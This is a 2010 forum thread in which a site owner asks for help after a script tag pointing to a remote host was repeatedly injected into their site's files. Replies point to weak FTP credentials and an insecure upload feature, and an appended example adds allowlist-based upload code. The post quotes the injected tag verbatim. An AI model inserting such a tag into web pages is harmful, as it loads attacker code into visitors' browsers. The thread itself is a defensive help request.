
script tag inserted

Posted: Fri Jul 09, 2010 4:40 am
by junjustkim
hi to all

I am using the CodeIgniter framework for my website, which is hosted on a shared hosting server. In most of my index.php, home.php, index.html and other .js files, a script like the one below was inserted at the end of the file, using different values in src="". Is this cross-site scripting? How did they inject it into my files? I used 755 as the file permission. How can I prevent this? I've encountered this twice. Even if I replace all the files, it gets attacked again. Additionally, not only one domain is being attacked; almost all the domains hosted on that server are.


<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->

Re: script tag inserted

Posted: Fri Jul 09, 2010 7:12 am
by timWebUK
Change your FTP password to something more secure - more than 8 characters, upper case, lower case, integers and symbols.

Re: script tag inserted

Posted: Sat Jul 10, 2010 6:16 am
by junjustkim
hi timWebUK,

Thanks for your immediate reply. I already changed my FTP password, but the hacker still attacked my site. To all the experts, please give me some advice or any suggestion to protect my site. I don't know what to do. I already reported it to the technical support of my hosting, but they said that there is something wrong with my code.

Please help me


Thanks

Re: script tag inserted

Posted: Sun Jul 11, 2010 3:22 am
by kaisellgren
Use SSH when transferring files to the server.

You might have a vulnerability in your application. It's hard to guess. Are you doing any sort of file uploading on your site?

Re: script tag inserted

Posted: Sun Jul 11, 2010 8:33 pm
by junjustkim
hi kaisellgren,

First, thank you for your help and suggestion. Does anyone know how the hacker could have inserted this script? Any thoughts about this?

I have file uploading to my site.


Thanks
Tirso

Re: script tag inserted

Posted: Tue Jul 13, 2010 2:38 am
by timWebUK
junjustkim wrote: I have file uploading to my site.
Chances are your file upload is insecure and they are exploiting it. If you post your code, we may be able to assist.

Re: script tag inserted

Posted: Tue Jul 13, 2010 11:53 am
by Ragnis
Very likely the hacker just uploaded a PHP file and then executed it by going to yourdomain.com/files/hackerfile.php.

To prevent further attacks you should add some kind of file extension check to your upload.
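
An added example, not part of the original thread and not the poster's code: one way to do the extension check suggested above as an allowlist, with the client-supplied file name discarded and the content type checked against the extension. The names ALLOWED, UPLOAD_DIR, stored_name_for and handle_upload are assumptions for illustration, and PHP 7.1 or later with the fileinfo extension is assumed.

```php
<?php
// Added example: allowlist-based upload handling (not code from the thread).
// ALLOWED, UPLOAD_DIR and both function names are assumptions for illustration.

const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
const UPLOAD_DIR = '/var/www/private_uploads'; // assumed path outside the web root

// Returns a server-generated file name, or null if the upload must be rejected.
function stored_name_for(string $clientName, string $detectedMime): ?string
{
    // Only the final extension is considered, compared case-insensitively.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    // Reject anything not on the allowlist or whose content does not match.
    if ((ALLOWED[$ext] ?? null) !== $detectedMime) {
        return null;
    }
    // Discard the client-supplied name entirely: a random name plus one
    // known-good extension cannot carry ".php" or path separators.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Handles one entry of $_FILES; returns the stored path or null on rejection.
function handle_upload(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Detect the type from the file content, not from what the client claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $name = stored_name_for($file['name'], (string) $mime);
    if ($name === null) {
        return null;
    }
    $dest = UPLOAD_DIR . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Constructed inputs showing the decision; runs only from the command line.
if (PHP_SAPI === 'cli') {
    foreach ([['photo.JPG', 'image/jpeg'], ['hackerfile.php', 'text/x-php'],
              ['notes.jpg', 'text/x-php']] as [$n, $m]) {
        printf("%-16s %-12s => %s\n", $n, $m, stored_name_for($n, $m) ?? 'REJECTED');
    }
}
```

An extension check on its own still leaves uploaded files reachable by URL, so the storage directory should sit outside the web root or have script execution disabled for it.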